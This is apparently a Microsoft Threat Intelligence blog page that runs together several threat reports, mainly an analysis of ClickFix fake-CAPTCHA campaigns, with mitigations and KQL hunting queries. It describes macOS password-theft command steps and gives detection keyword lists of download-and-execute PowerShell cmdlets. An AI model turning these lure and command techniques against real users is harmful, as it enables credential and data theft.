Microsoft Defender for Cloud Defender for Resource Manager – Suspicious invocation of a high-risk ‘Credential Access’ operation detected (Preview) Defender for Key Vault – Suspicious key vault recovery detected – Unusual application accessed a key vault – Unusual operation pattern in a key vault – Unusual user accessed a key vault
Discovery
– Verifying whether Microsoft Defender for Endpoint is onboarded on a machine – Reconnaissance activity against Active Directory/Entra ID/Azure – AzureHound tool invocation in the cloud environment
Microsoft Defender for Endpoint – Suspicious sequence of exploration activities
Microsoft Defender for Cloud Apps – Suspicious use of AzureHound
Microsoft Defender for Identity – Reconnaissance tool was observed
Microsoft Defender for Cloud Defender for Resource Manager – AzureHound tool invocation detected
Lateral movement
– Lateral movement between endpoints in the network – Lateral movement using Evil-WinRM – Cloud sign-in attempts using stolen credentials or access tokens extracted from compromised endpoints
Microsoft Defender for Endpoint – Possibly malicious use of proxy or tunneling tool – Suspicious remote PowerShell execution
Microsoft Defender for Cloud Apps – Suspicious login from AADInternals tool
Exfiltration
– Data collection and theft from Azure Storage accounts
Microsoft Defender for Cloud Defender for Resource Manager – Suspicious invocation of a high-risk ‘Data Collection’ operation detected (Preview) Defender for Storage – The access level of a potentially sensitive storage blob container was changed to allow unauthenticated public access – Publicly accessible storage containers successfully discovered – Publicly accessible storage containers unsuccessfully scanned – Unusual amount of data extracted from a storage account – Unusual deletion in a storage account – Unusual amount of data extracted from a sensitive blob container – Unusual number of blobs extracted from a sensitive blob container – Unusual SAS token was used to access an Azure storage account from a public IP address – Suspicious external access to an Azure storage account with overly permissive SAS token – Suspicious external operation to an Azure storage account with overly permissive SAS token – Access from a suspicious IP address
Impact
– Mass Azure data store resources deletion and encryption
Microsoft Defender XDR – Suspicious Azure data store resources deletion attempt by a user with an active session on a device involved in a credential theft attempt
Microsoft Defender for Cloud Defender for Resource Manager – Suspicious backup resource deletion (Preview) – Suspicious invocation of a high-risk ‘Impact’ operation detected (Preview) Defender for Storage – Unusual deletion in a storage account
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following query to find related activity in their networks:
Sign-in activity
Explore sign-in activity from IdentityLogonEvents, look for uncommon behavior, such as sign-ins from newly seen IP addresses or sign-ins to new applications that are non-sync related:
IdentityLogonEvents
| where Timestamp > ago(30d)
| where AccountDisplayName contains "On-Premises Directory Synchronization Service Account"
| extend ApplicationName = tostring(RawEventData.ApplicationName)
| project-reorder Timestamp, AccountDisplayName, AccountObjectId, IPAddress, ActionType, ApplicationName, OSPlatform, DeviceType
The activity of the sync account is typically repetitive, coming from the same IP address to the same application. Any deviation from the natural flow is worth investigating. Cloud applications that are usually accessed by the Microsoft Entra ID sync account are Microsoft Azure Active Directory Connect, Windows Azure Active Directory, and Microsoft Online Syndication Partner Portal.
Cloud activity
Explore the cloud activity (ActionType) of the sync account. Similar to sign-in activity, this account by nature performs a certain set of actions including update User., update Device., and so on. New and uncommon activity from this user might indicate an interactive use of the account, which could legitimate action from someone in the organization or malicious action by the threat actor.
CloudAppEvents
| where Timestamp > ago(30d)
| where AccountDisplayName has "On-Premises Directory Synchronization Service Account"
| extend Workload = RawEventData.Workload
| project-reorder Timestamp, IPAddress, AccountObjectId, ActionType, Application, Workload, DeviceType, OSPlatform, UserAgent, ISP
Pay close attention to action from different DeviceTypes or OSPlatforms, this account automated service is performed from one specific machine, so there shouldn’t be any variety in these fields.
Azure management events
Explore Azure management events by querying the new CloudAuditEvents table in advanced hunting in the Defender portal. The OperationName column indicates the type of control-plane event executed by the user.
Explore Microsoft Security Exposure Management capabilities by querying the ExposureGraphNodes and ExposureGraphEdges tables in the advanced hunting in the Defender portal. By utilizing these tables, you can identify critical assets, including Azure Storage accounts that contain sensitive data or protected by an immutable storage policy. All predefined criticality rules can be found here: Predefined classifications
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Over the past year, Microsoft Threat Intelligence and Microsoft Defender Experts have observed the ClickFix social engineering technique growing in popularity, with campaigns targeting thousands of enterprise and end-user devices globally every day. Since early 2024, we’ve helped multiple customers across various industries address such campaigns attempting to deliver payloads like the prolific Lumma Stealer malware. These payloads affect Windows and macOS devices and typically lead to information theft and data exfiltration.
The ClickFix technique attempts to trick users into running malicious commands on their devices by taking advantage of their target’s tendency to solve minor technical issues and other seemingly benign interactions, such as human verification and CAPTCHA checks. It typically gives the users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, or Windows PowerShell. It’s often combined with delivery vectors such as phishing, malvertising, and drive-by compromises, most of which even impersonate legitimate brands and organizations to further reduce suspicion from their targets.
Because ClickFix relies on human intervention to launch the malicious commands, a campaign that uses this technique could get past conventional and automated security solutions. Organizations could thus reduce the impact of this technique by educating users in recognizing its lures and by implementing policies that will harden the device configurations in their environment (for example, disallowing users to use the Run dialog if it’s not necessary in their daily tasks). Microsoft Defender XDR also provides a comprehensive set of protection features that detect this threat at various stages of the attack chain.
This blog discusses the different elements that make up a ClickFix campaign—from the arrival vectors it comes with to its various implementations—and provides different examples of threat campaigns we’ve observed to further illustrate these elements. We also provide recommendations and detection details to surface and mitigate this threat.
A typical ClickFix attack begins with threat actors using phishing emails, malvertisements, or compromised websites to lead unsuspecting users to a visual lure—usually a landing page—and trick them into executing a malicious command themselves. By adding this user interaction element in the attack chain, a threat using the ClickFix technique could slip through conventional and automated security solutions.
Microsoft Threat Intelligence observed threat actors adapting and improving certain elements of the technique to further evade detection. For example, threat actors obfuscate the JavaScript that generates the visual lures or they download parts of the code from different servers. They also employ various tactics in obfuscating malicious commands. We discuss these stages of the attack chain in detail in the succeeding sections of this blog.
Once the malicious command is run by the user, malware is downloaded into the target device. We’ve observed numerous threat actors that leverage ClickFix attacks deliver the following:
Infostealers like LummaStealer, which appears to be the most prolific ClickFix final payload based on our observations and threat hunting investigations
Remote access tools (RATs) such as Xworm, AsyncRAT, NetSupport, and SectopRAT, which could allow threat actors to conduct hands-on keyboard activity like discovery, lateral movement, and persistence
Loaders like Latrodectus and MintsLoader, which could deliver additional malware and other payloads
Rootkits, such as a modified version of the open source r77, which could allow threat actors to employ several sophisticated persistence and defense evasion tactics and remain deeply embedded in a victim system
These final payloads are often “fileless”, that is, they’re seldom written to disk as a Windows executable (.exe or .dll) file. Instead, they’re loaded and launched in memory by living-off-the-land binaries (LOLBins), often as a .NET assembly or Common Language Runtime (CLR) module. However, whether the malware is on disk or in memory, we’ve observed its code injected into LOLBins, such as msbuild.exe, regasm.exe, or powershell.exe.
Figure 1. The typical ClickFix attack chain
Case study: Lampion malware campaign
To illustrate a typical ClickFix attack chain, let’s look at a campaign we first identified in May 2025 targeting Portuguese organizations in government, finance, and transportation sectors to deliver Lampion malware, an infostealer focused on banking information. This campaign has since been observed in other countries—including Portugal, Switzerland, Luxembourg, France, Hungary, and Mexico—targeting organizations in the government, education, transportation, and financial services industries. As of June 2025, this campaign remains active.
The Lampion malware campaign’s ClickFix lures, obfuscation methods, and multi-stage infection process are designed to evade detection:
The threat actor sends phishing emails containing a ZIP file, which when opened, contains an HTML file that redirects target users to a fake Portuguese tax authority site where the ClickFix lure is hosted.
The ClickFix lure tricks users into launching a PowerShell command that downloads an obfuscated VBScript (.vbs).
The downloaded script then writes a second obfuscated .vbs file to the Windows %TEMP% directory and schedules it to run later using a hidden task.
This second .vbs file downloads a third and much larger .vbs file that performs reconnaissance, checks for antivirus or sandbox environments, and sends system data to a command-and-control (C2) server.
The third script also creates a .cmd file in the Windows startup folder, naming it after the user’s hostname, and schedules a system restart.
After the device restarts, the .cmd file launches a large DLL through rundll32.exe and attempts to deliver the final payload.
However, during our investigation, the actual Lampion malware wasn’t delivered because the download command was commented out of the code.
Figure 2. Lampion infection chain
Before the click: Arrival vectors
Threat actors leveraging ClickFix rely on a variety of methods to lure unwitting users. We’ve observed three primary avenues where a user could encounter a ClickFix prompt: by receiving phishing emails, encountering a malicious ad, or by visiting a compromised or malicious website.
Phishing
Microsoft Threat Intelligence first observed the use of the ClickFix technique between March and June 2024 in email campaigns sent by a threat actor we track as Storm-1607. These emails contained HTML attachments that attempted to install DarkGate, a commodity loader that is capable of keylogging, cryptocurrency mining, establishing C2 communications, and downloading additional malicious payloads, among others.
One of Storm-1607’s campaigns observed in May 2024 consisted of tens of thousands of emails targeting organizations in the United States (US) and Canada. These emails used payment and invoice lures and contained attachments with file names like reports_528647.html:
Figure 3. Storm-1607 phishing email
When opened, the HTML loaded a page with a fake Microsoft Word new document image and a dialog box showing an error message and prompting the user to click the How to fix button:
Figure 4. HTML attachment displaying a Microsoft Word background and ClickFix lure
Clicking the button copied the malicious code on the user’s clipboard in the background. Meanwhile, the dialog box added new instructions that explained to the user how to open Windows Terminal and paste the malicious code into it:
Figure 5. ClickFix lure displaying further instructions
While other threat actors also use invoice or payment lures in their phishing campaigns, as of this writing, including HTML attachments in the emails is no longer the preferred method to implement the ClickFix technique. Instead, threat actors now include in their phishing email a URL that points to a ClickFix landing page. For example, in March 2025, we observed a threat actor tracked as Storm-0426 launch a campaign consisting of thousands of phishing emails that targeted users in Germany and attempted to install MintsLoader. The emails used payment and invoice lures purportedly from a web hosting provider and contained URLs leading to the Prometheus traffic direction system (TDS) hosted on numerous compromised sites:
Figure 6. Storm-0426 phishing email
The TDS redirected users to the attacker-controlled website mein-lonos-cloude[.]de, where the ClickFix technique instructed the users to complete a human verification process by following the displayed instructions, which launched a malicious code:
Figure 7. ClickFix landing page
Another example of a phishing campaign using URLs and redirectors was observed in June 2025, where the campaign impersonated the US Social Security Administration (SSA) and used a combination of social engineering and domain spoofing to deliver ScreenConnect, a legitimate remote management tool that has become increasingly abused by threat actors. Once installed, ScreenConnect could give an attacker full remote control over a victim’s system, enabling them to exfiltrate data, install additional malware, or conduct surveillance.
The campaign began with emails sent from a legitimate but compromised Brazilian domain. The message, which even included legitimate links to SSA’s official social media accounts in the footer, claimed that there was an issue with the recipient’s social security statement. Like other phishing emails, these characteristics and tactics were all attempts by the threat actor to bypass spam filters, lend credibility and reduce suspicion to the message, and prompt the user to take immediate action:
Figure 8. Phishing email impersonating the US SSA
The message’s call-to-action button, labeled Download Statement, was also particularly deceptive because instead of linking directly to a malicious site, it used a Google Ads URL redirect to obfuscate the final destination. This technique not only helped the email pass through conventional email security solutions, it also undermined an email best practice (hovering over the links before clicking to determine if the URL displayed points to the intended site or not) users are typically taught as part of their security awareness trainings.
When a user clicked the Download Statement button, they were redirected to a spoofed SSA website hosted on a Spanish top-level domain (access-ssa-gov[.]es). The site closely mimicked the real SSA home page, including a blurred background image of the legitimate site to create a false sense of familiarity and trust:
Figure 9. ClickFix landing page impersonating the US SSA
The landing page presented the user with a CAPTCHA human verification pop-up, which was part of the ClickFix technique. Behind the scenes, this interaction triggered a series of fake verification steps designed to guide the user into running a PowerShell script that would eventually download and launch the ScreenConnect payload:
Figure 10. ClickFix instructions from the spoofed US SSA domain
Malvertising
Malvertising is another popular delivery method that leads to ClickFix landing pages. In a campaign observed in April 2025, users who attempted to stream free or pirated movies on certain websites inadvertently launched a variety of scam pages in a new browser tab when they interacted with a movie (for example, by pressing the play button):
Figure 11. Example of a free movie streaming website
One of these scam pages was a ClickFix landing page that downloaded and installed Lumma Stealer:
Figure 12. ClickFix landing page the users were redirected to if they clicked the “Play” button on the free movie website
This activity cluster is notable because it renamed the various intermediate HTA scripts to media format extensions such as .mp3, .mp4, or .ogg. It’s also notable for its high traffic volumes: in a single day, tens of thousands, if not hundreds of thousands, of unique visitors could be funneled to scam pages (including the ClickFix landing page) through the malvertising redirectors.
Drive-by compromise
Some threat actors have also been observed to leverage compromised websites to deliver the ClickFix landing page. For example, the threat actor we track as Storm-0249 has traditionally used email to deliver Latrodectus or other initial access malware—whether by using PDF files or URL links (sometimes copyright infringement-themed). However, since the beginning of March 2025, Storm-0249 switched to compromising legitimate websites, potentially through WordPress vulnerabilities, and using the ClickFix technique to deliver its payloads.
When a user visits the compromised site, the original page is briefly displayed before it’s replaced with the ClickFix human verification lure. This specific lure even spoofs Cloudflare to further trick users into thinking that the verification step is legitimate:
Figure 13. ClickFix lure spoofing Cloudflare Turnstile on a compromised site
Inside the click: ClickFix implementations
ClickFix operators use several methods to attempt to convince a target to perform user-level command execution on their system. Early landing pages mimicked Google’s “Aw, Snap!” crash error or Word Online extension missing message (as depicted in Figure 4), while recent ones spoof Google’s reCAPTCHA and Cloudflare’s Turnstile solution. We’ve even observed threat actors spoof social media platforms like Discord to trick users into believing they’re joining an actual Discord server. Many elements go into building ClickFix lure pages—from JavaScript inline frames (iframes) and HTML href codes to cascading style sheets (CSS) resources—to make them more legitimate-looking.
There are various ways that ClickFix is implemented: some implementations are contained in one file or page, while others use remote resources. Some threat actors leave code comments amateurishly while others obfuscate their code. There are even implementations that report the status of an infection to a Telegram channel or a web server. We provide a few examples of these implementations and discuss their inner workings.
Impersonating Cloudflare Turnstile
Figure 14 shows a partial screenshot of a ClickFix landing page, binancepizza[.]info, displaying a seemingly legitimate Cloudflare Turnstile verification process that a user is lured to interact with before they can supposedly access the site:
Figure 14. The ClickFix landing page binancepizza[.]info
Its HTML source code clones this Cloudflare Turnstile style page using a href attribute to a CSS resource hosted by the Font Awesome library:
Figure 15. HTML code highlighting a CSS resource for a Cloudflare verification prompt
The page also references an HTML file (field.html) using a hidden iframe:
Figure 16. HTML code highlighting hidden iframe and text needing to “verify”
Within field.html, we see in Figure 17 that contentElis the iframe element representing the fake Cloudflare Turnstile verification check box. When a user ticks the Verify you are human check box, this script animates a fake spinner through runVerification()and sends postMessage(“trigger”) to the parent window (the main landing page).
Figure 17. JavaScript code of iframe field.html, highlighting elements that send a trigger message upon verification click
The user is then presented with the ClickFix instructions (Figure 18), while the obfuscated command is copied to the user’s clipboard (Figure 19):
Figure 18. ClickFix instructions from binancepizza[.]infoFigure 19. Malicious command copied to clipboard
Figure 20 shows that the clipboard copy occurs once the code receives the message “trigger”, which is sent by the field.html hidden iframe. Once that message is received, the script uses navigator.clipboard.writeText(codeToCopy) to copy the command to the clipboard.
Figure 20. JavaScript code highlighting the method navigator.clipboard.writeText, which copies a malicious command to clipboard
Impersonating social platforms
It’s important to note that not all ClickFix landing pages are designed in the same manner and might not strictly contain the elements discussed previously. In some instances, threat actors also mimic popular social platforms to broaden their reach of potential targets.
Figure 21 shows a ClickFix landing page spoofing a Discord server supposedly needing to verify a user before they can join:
Figure 21. Fake Discord server landing page implementing ClickFix.
In this page’s source code (Figure 22), we can see it referencing the Discord logo image file to appear legitimate. Additionally, theaddEventListener method waits for the Verify button to get clicked (through verifyBtn) so navgiator.clipboard.writetext(command) can copy the malicious command to the user’s clipboard. This JavaScript method is a Clipboard API that allows for accessing the operating system (OS) clipboard. Older pages might use document.execCommand(), which is now deprecated.
The fake Discord landing page differs from the previous example because the reference of an external trigger (from the hidden iframe) isn’t used here. Instead, the click then copy is all processed from the main window. Based on our analysis, this landing page also appears to be part of the OBSCURE#BAT campaign delivering r77 rootkit.
Figure 22. HTML code highlighting use of Discord logo and JavaScript elements that copy a malicious command to clipboard upon clicking “verify”
The “fix”: User-level code execution
The ClickFix technique typically presents its “fix” by instructing users to run malicious commands or code in the Windows Run dialog box. We assess that the threat actors who use this technique are banking on the idea that most of their targets aren’t familiar with this Windows OS component and what it’s used for, unlike the more advanced users doing system administrator tasks. Early ClickFix lures instructed users to run commands manually and directly in Windows Terminal or Windows PowerShell. However, multiple line warnings might have deterred potential victims from running these commands, leading to the threat actors changing their tactics.
Figure 23. Example of a multiple line warning in Windows Terminal
Detecting Windows Run dialog misuse
The Windows Run dialog (Win + R) is a trusted shell input user interface (UI) that’s part of Windows Explorer (explorer.exe). Internally, it uses ShellExecute or CreateProcess APIs to resolve and launch commands. The input is limited to MAX_PATH, requiring a null-terminated string (\0) with a practical maximum of 259 characters. Additionally, as part of the Run dialog, Windows loads tiptsf.dll module in explorer.exe. This DLL file is related to the Text Services Framework (TSF), which provides input processor interface.
Figure 24. The Windows Run dialog box
Entering commands into the Run dialog leaves forensic traces—most notably in the RunMRU(Most Recently Used) registry key. This key keeps a history of Run dialog executions and can be used to reconstruct user-initiated activity during investigations. Note that it doesn’t create a registry entry if the process execution fails.
Figure 25. RunMRU registry key entry with a malicious ClickFix command
To determine if a ClickFix command execution is potentially occurring in the environment, one can check the RunMRU entries if they include signs pointing to LOLBins—such as powershell, mshta, rundll32, wscript, curl, and wget—that can execute code and/or download payloads. PowerShell continues to be the most leveraged native binary, with cmdlets such as iwr (Invoke-WebRequest), irm (Invoke-RestMethod), and iex (Invoke-Expression) being very prolific.
Additional suspicious elements to check in entries within the RunRMU registry key include the following:
First-stage payloads are often hosted by direct IP addresses, content delivery network (CDN) domains, interesting top-level domains (for example, .live,. shop, .icu), or code-sharing platforms such as pastes.
First-stage payloads are often delivered and/or launched as specific file type such as .html, .hta, .txt, .zip, .msi, .bat, .ps1, or .vbs
The file type of the scripts might be renamed to media extensions (such as .png, .mp3, .mp4, .wav, and .jpg) to hide their true intent.
The file type might employ double file extension for evasion (for example, file.hta.mp4)
URLs are often shortened using shorteners such as Bitly.
A fake reCAPTCHA, CAPTCHA, or Turnstile confirmation is included, such as the following:
✅ “I am not a robot – reCAPTCHA Verification ID: XXXX”
# # I am not a robot: CAPTCHA Verification UID: XXXX\
# “Human, not a robot: CAPTCHA: Verification ID: XXXX”
✔️ “Cloud identificator:XXXX”
Figure 26. Examples of generic ClickFix commands
Obfuscation and execution techniques for defense evasion
The command examples in the previous section aren’t all encompassing, as we’ve observed threat actors employing a growing number of obfuscation and execution techniques for defense evasion. These techniques include nested execution chains, proxy command abuse, encoding schemes such as Base64, use of string concatenation/fragmentation, and escaped characters, among others.
Figure 27. Example of a ClickFix command that was using nested PowerShell, string obfuscation through concatenated ampersand (“&”) delimiters, and benign sounding phrase (for example, “Microsoft Defender Services Secure Access”)Figure 28. Example of a ClickFix command that was using LOLBIN stacking (repeated cmd.exe) and obfuscation through escape characters (^)Figure 29. Example of a ClickFix command that was obfuscated using string splitting and concatenation, indexed character access through the $1 command string, and ampersand execution
Beyond Windows: ClickFix targeting macOS users
In June 2025, a ClickFix campaign was reported to be targeting macOS users to deliver Atomic macOS Stealer (AMOS). This new campaign is yet another mark in the continuously evolving threat landscape, as the ClickFix technique was previously observed to be more common in Windows-based attacks.
The campaign, which according to our analysis goes back to late May 2025, redirected target users to Clickfix-themed delivery websites that were impersonating Spectrum, a US-based company that provides services for cable television, internet access, and unified communications:
Figure 30. ClickFix landing page with a fake CAPTCHA
Like any other ClickFix campaign, when the user clicks the Alternate verification button, the page displays instructions the user has to follow to “fix” their issue. Interestingly, the steps the lure displays even on macOS users are for Windows devices:
Figure 31. ClickFix instructions presented to the target user
Meanwhile, in the background, a malicious command is copied to the user’s clipboard. The command that is copied is different for macOS and Windows devices.
Windows:
Figure 32. Screenshot of the ClickFix command copied on Windows devices
macOS:
Figure 33. Screenshot of the ClickFix command copied on macOS devices
The command that’s copied for macOS devices instructs the system to perform the following actions:
Get current user:username=$(whoami)
Prompt for the correct password: Continuously prompt System Password: until the user enters the correct password
Validate password: Use dscl . -authonly to verify the password against macOS directory services
Store password: Save the valid password to the /tmp/.pass file
Remove quarantine: Use the stolen password with sudo -S xattr -c to bypass macOS security
Make an executable file:chmod +x /tmp/update
Launch the malware: Run the downloaded file /tmp/update
The file saved as update within the tmp directory belongs to the AMOS malware family. AMOS variants such as Poseidon and Odyssey are known to steal user information, including browser cookies, passwords, and cryptocurrency wallet credentials.
Behind the click: ClickFix kits and other services for sale
Microsoft Threat Intelligence has observed several threat actors selling the ClickFix builders (also called “Win + R”) on popular hacker forums since late 2024. Some of these actors are bundling ClickFix builders into their existing kits that already generate various files such as LNK, JavaScript, and SVG files. The kits offer creation of landing pages with a variety of available lures including Cloudflare. They also offer construction of malicious commands that users will paste into the Windows Run dialog. These kits claim to guarantee antivirus and web protection bypass (some even promise that they can bypass Microsoft Defender SmartScreen), as well as payload persistence. The cost of subscription to such a service might be between US$200 to US$1,500 per month. We’ve also discovered sellers that offer one-time and piece-meal solutions (for example, only the source code, landing page, or the command line) priced anywhere between US$200 and US$500.
Figures 34 and 35 show an example of a ClickFix builder that offers a variety of configurable options such as:
Displaying a decoy PDF file after a target user is phished
Payload execution timing
Virtual machine (VM) detection and evasion (“Anti VM”) and user access control (UAC) bypass
Visual template to be used, such as Google Meet, Google CAPTCHA, or Cloudflare
Language to be used, for example, English, German, Spanish, French, Italian, or Portuguese
Figure 34. Screenshot of a ClickFix builder, taken from the seller’s demo videoFigure 35. Another screenshot of a ClickFix builder, taken from the seller’s demo video
ClickFix protection and detection
Microsoft Defender XDR offers comprehensive coverage for ClickFix attacks by leveraging a range of available technologies across different attack layers. For example, Microsoft Defender SmartScreen displays a warning to Microsoft Edge users when they visit a ClickFix landing page:
Figure 36. Microsoft Defender SmartScreen flagging a ClickFix landing page
Even if a user chooses to bypass the SmartScreen warning or is using a different web browser and is socially engineered to execute a command in the Run dialog, Microsoft Defender for Endpoint detects and mitigates the attacks initial access activities like the suspicious process execution and command-line activity during the process scan phase.
Most attack paths eventually lead to the execution of either PowerShell or HTA scripts. Microsoft’s Antimalware Scan Interface (AMSI) provides scanning capabilities for both scripting environments and PowerShell applications. Defender’s Cloud Protection delivers enhanced protection by monitoring and intercepting outgoing connections to malicious URLs as well as analyzing process execution patterns. Additionally, Microsoft Defender for Office 365 analyzes end-to-end links and HTML attachments, and has fake CAPTCHA behavioral signatures that proactively block ClickFix-related phishing emails.
Additional attack chain coverage with network protection
In early 2025, Microsoft Defender Experts observed thousands of devices being affected by a ClickFix attack (that is, the ClickFix command was executed by a user on the device) per month, even with an endpoint detection and response (EDR) solution enabled. Due to this, our researchers performed pattern-of-life analysis to follow the tactics, techniques, and procedures (TTPs) in the attack timeline and understand the gaps that can be filled so that the attack could be stopped at the initial access stage. Their research resulted in the automation of the analysis and collection of numerous obfuscated/encoded LOLBin commands observed in the RunMRU registry, and they were able to successfully extract and block newly created malicious domainsthrough Defender for Endpoint’s network protection feature. This feature is an important component on the protection against ClickFix because blocking the C2 domains early in the attack chain prevents the download and/or execution of first-stage payloads, effectively making the attack unsuccessful.
Recommendations
Microsoft Threat Intelligence recommends the following mitigations to reduce the impact of this threat.
Educate users to identify social engineering attacks.
Ensure users are aware of what they copy and paste.
Check your Microsoft 365 email filtering settings to ensure spoofed emails, spam, and emails with malware are blocked. Use Microsoft Defender for Office 365 for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Defender for Office 365 to recheck links on click and delete sent mail in response to newly acquired threat intelligence. Turn on safe attachments policies to check attachments to inbound email.
Block web pages from automatically running Flash plugins.
Enable network protection and web protection in Microsoft Defender for Endpoint to safeguard against malicious sites and internet-based threats.
Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
Enable PowerShell script block logging to detect and analyze obfuscated or encoded commands, providing visibility into malicious script execution that might otherwise evade traditional logging.
Use PowerShell execution policies such as setting AllSigned or RemoteSigned tohelp reduce the risk of malicious execution by ensuring only trusted, signed scripts are executed, adding a layer of control.
Use Group Policy to deploy hardening configurations throughout your environment, if certain features are not necessary:
Disable the Run dialog box (Win + R) key and remove the Run option from the Start Menu by selecting User Configuration > Administrative Templates > Start Menu and Taskbar > Remove Run menu from Start Menu.
Create an App Control policy that prohibits the launch of native Windows binaries from Run. This can be accomplished by defining a rule based on the specific process that is launching binaries like PowerShell.
Microsoft Defender XDR customers can also implement the following attack surface reduction rules to harden an environment against PowerShell techniques used by threat actors:
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects this threat as the following malware:
The following Microsoft Defender for Endpoint alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity:
Suspicious command in RunMRU registry
Use of living-off-the-land binary to run malicious code
Suspicious process executed PowerShell command
Suspicious PowerShell command line
Suspicious ‘SuspClickFix’ behavior was blocked
An active ‘SuspDown’ malware was prevented from executing via AMSI
Suspicious ‘MaleficAms’ behavior was blocked
An active ‘ClickFix’ malware in a command line was prevented from executing
‘ClickFix’ malware was prevented
Information stealing malware activity
Powershell made a suspicious network connection
Suspicious process launch by Rundll32.exe
Suspicious Rundll32 command-line
Suspicious Scheduled Task Process Launched
Microsoft Defender for Office 365
Microsoft Defender for Office 365 detects malicious activity associated with this threat through the following alerts:
A potentially malicious URL click was detected
Email messages containing malicious URL removed after delivery
Email messages removed after delivery
A user clicked through to a potentially malicious URL
Suspicious email sending patterns detected
Email reported by user as malware or phish
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:
Check impact of an external threat article
Suspicious script analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following query to find related activity in their networks:
ClickFix commands execution
Identify ClickFix commands execution.
DeviceRegistryEvents
| where ActionType =~ "RegistryValueSet"
| where InitiatingProcessFileName =~ "explorer.exe"
| where RegistryKey has @"\CurrentVersion\Explorer\RunMRU"
| where RegistryValueData has "✅"
or (RegistryValueData has_any ("powershell", "mshta", "curl", "msiexec", "^")
and RegistryValueData matches regex "[\u0400-\u04FF\u0370-\u03FF\u0590-\u05FF\u0600-\u06FF\u0E00-\u0E7F\u2C80-\u2CFF\u13A0-\u13FF\u0530-\u058F\u10A0-\u10FF\u0900-\u097F]")
or (RegistryValueData has "mshta" and RegistryValueName !~ "MRUList" and RegistryValueData !in~ ("mshta.exe\\1", "mshta\\1"))
or (RegistryValueData has_any ("bitsadmin", "forfiles", "ProxyCommand=") and RegistryValueName !~ "MRUList")
or ((RegistryValueData startswith "cmd" or RegistryValueData startswith "powershell")
and (RegistryValueData has_any ("-W Hidden ", " -eC ", "curl", "E:jscript", "ssh", "Invoke-Expression", "UtcNow", "Floor", "DownloadString", "DownloadFile", "FromBase64String", "System.IO.Compression", "System.IO.MemoryStream", "iex", "Invoke-WebRequest", "iwr", "Get-ADDomainController", "InstallProduct", "-w h", "-X POST", "Invoke-RestMethod", "-NoP -W", ".InVOKe", "-useb", "irm ", "^", "[char]", "[scriptblock]", "-UserAgent", "UseBasicParsing", ".Content")
or RegistryValueData matches regex @"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\s[A-Za-z0-9+/=]{15,}"))
Lampion malware activity
The following query searches for PowerShell command associated with Lampion malware activity that is used to download malicious files.
DeviceProcessEvents
| where InitiatingProcessFileName == "powershell.exe"
| where InitiatingProcessParentFileName == "explorer.exe"
| where FileName has_any ("WScript.exe")
| where ProcessCommandLine contains "\"PowerShell.exe\" -windowstyle minimized -Command"
and ProcessCommandLine has "Invoke-WebRequest"
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
To know how Microsoft can help your team stop similar threats and prevent future compromise with human-led managed services, check out Microsoft Defender Experts for XDR.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Among the plethora of advanced attacker tools that exemplify how threat actors continuously evolve their tactics, techniques, and procedures (TTPs) to evade detection and maximize impact, PipeMagic, a highly modular backdoor used by Storm-2460 masquerading as a legitimate open-source ChatGPT Desktop Application, stands out as particularly advanced.
Beneath its disguise, PipeMagic is a sophisticated malware framework designed for flexibility and persistence. Once deployed, it can dynamically execute payloads while maintaining robust command-and-control (C2) communication via a dedicated networking module. As the malware receives and loads payload modules from C2, it grants the threat actor granular control over code execution on the compromised host. By offloading network communication and backdoor tasks to discrete modules, PipeMagic maintains a modular, stealthy, and highly extensible architecture, making detection and analysis significantly challenging.
